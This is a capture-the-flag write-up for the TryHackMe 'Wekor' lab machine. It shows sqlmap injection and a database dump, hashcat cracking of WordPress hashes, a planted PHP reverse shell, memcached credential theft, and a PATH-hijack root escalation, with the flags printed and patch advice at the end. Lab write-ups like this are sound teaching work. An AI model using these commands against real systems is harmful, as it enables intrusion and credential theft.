--- title: "Writeup - Wekor (THM)" date: 2022-04-17 slug: "writeup-wekor-thm" type: "writeup-ctf" --- This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV -T4 -Pn 10.10.11.146 ``` Two TCP ports are discovered: ![](img/image-1.webp) - 22/tcp : SSH port (OpenSSH 8.2) - 80/tcp : HTTP web server (Apache 2.4.41) ## Exploit At first I start by listing the pages of the website. ![](img/image-2.webp) I find a `robots.txt` file in which the following pages are listed: ```bash User-agent: * Disallow: /workshop/ Disallow: /root/ Disallow: /lol/ Disallow: /agent/ Disallow: /feed Disallow: /crawler Disallow: /boot Disallow: /comingreallysoon Disallow: /interesting ``` While exploring I come across the following message: ```bash Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot ! ``` So there is a site hosted in the `it-next` next folder: ![](img/image-3.webp) After some research I find an `Applie coupon` field on the `it_cart.php` page. I get a query using burp, then I run `sqlmap` to extract the database list. ```bash ┌──(d3vyce㉿kali)-[~/Documents] └─$ sqlmap -r request.txt --dbs --batch ___ __H__ ___ ___[(]_____ ___ ___ {1.6.4#stable} |_ -| . ['] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [...] web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.6 [16:07:49] [INFO] fetching database names available databases [6]: [*] coupons [*] information_schema [*] mysql [*] performance_schema [*] sys [*] wordpress [16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm' [*] ending @ 16:07:49 /2022-04-13/ ``` I find a `wordpress` database, I will try to extract it with the following command: ```bash ┌──(d3vyce㉿kali)-[~/Documents] └─$ sqlmap -r request.txt -D wordpress --dump --batch [...] [4 entries] +------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ | ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key | +------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ | 1 | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. | admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | | | 5743 | http://jeffrey.com | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 | | 5773 | http://yura.com | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | | | 5873 | http://eagle.com | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | | +------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ [...] ``` In the interval I find 4 user/password pairs. I put them in a file and I run `hashcat`. ```bash ┌──(d3vyce㉿kali)-[~/Documents] └─$ hashcat -m 400 hash wordlist/rockyou.txt [...] $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx (eagle) $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou (jeffrey) $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13 (yura) [...] ``` After a few seconds, we find all the passwords except the one of Admin. Now that we have credentials, we need to find the wordpress site; I launch a subdomain scan. ![](img/image-4.webp) I find the `site` subdomain, I add it to the `/etc/hosts`, then I go to the site. On this page, I find the following text: ```bash Hi there! Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! - Jim ``` This does not bring me much, so I launch a page scan on this subdomain. ![](img/image-5.webp) After a few seconds I finally found the WordPress site! ![](img/image-6.webp) So I go to the `wp-admin` page to connect to the admin panel. After trying the user `jeffrey`, I realize that he doesn't have admin permission, so I test the user `yura` and it works. I can now modify the content of the 404.php page of the twentytwentyone theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). By accessing the following page I execute the php code : ```bash http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php ``` I now have a reverse shell, but I don't have access to the first flag. ![](img/image-7.webp) So I look if I can't find a file with an interesting service to change the user. In the open ports, I find the port 11211 : ![](img/image-8.webp) After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credencials of the user Orka in the cache. ![](img/image-9.webp) I can now change the user and get the first flag back. ```bash Orka@osboxes:~$ cat user.txt cat user.txt 1a26a6d51c0172400add0e297608dec6 ``` ## Privilege escalation I start by checking the user's authorization. Interestingly, my user has the right to run the `bitcoin` script with root rights. ![](img/image-10.webp) I try to launch the script but without success, it needs a password to launch it. ![](img/image-11.webp) So I try to extract the strings from the program and I find the following in the result: ```bash Orka@osboxes:~/Desktop$ strings bitcoin [...] Enter the password : password Access Denied... Access Granted... User Manual: Maximum Amount Of BitCoins Possible To Transfer at a time : 9 Amounts with more than one number will be stripped off! And Lastly, be careful, everything is logged :) Amount Of BitCoins : Sorry, This is not a valid amount! python /home/Orka/Desktop/transfer.py %c [...] ``` The password to use the program would be `password` and then there is the execution of a python script. What is interesting is the use of python without using a relative route. This combined with the fact that I have write permissions in the `/usr/sbin/python` folder which is in the `$PATH` variable, I will be able to create a custom version of the python program.ndes suivante : ```bash touch /usr/sbin/python echo '#!/bin/bash' > /usr/sbin/python echo '/bin/bash' >> /usr/sbin/python chmod +x /usr/sbin/python ``` I now run the `bitcoin` program with sudo and enter the password. ![](img/image-12.webp) I am now root of the machine and I can get the last flag. ```bash root@osboxes:~/Desktop# cat /root/root.txt cat /root/root.txt f4e788f87cc3afaecbaf0f0fe9ae6ad7 ``` ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Sanitizing Inputs must be implemented to avoid SQL injections - Use strong passwords - Set up Memcached authentication - Use absolute paths when using programs in scripts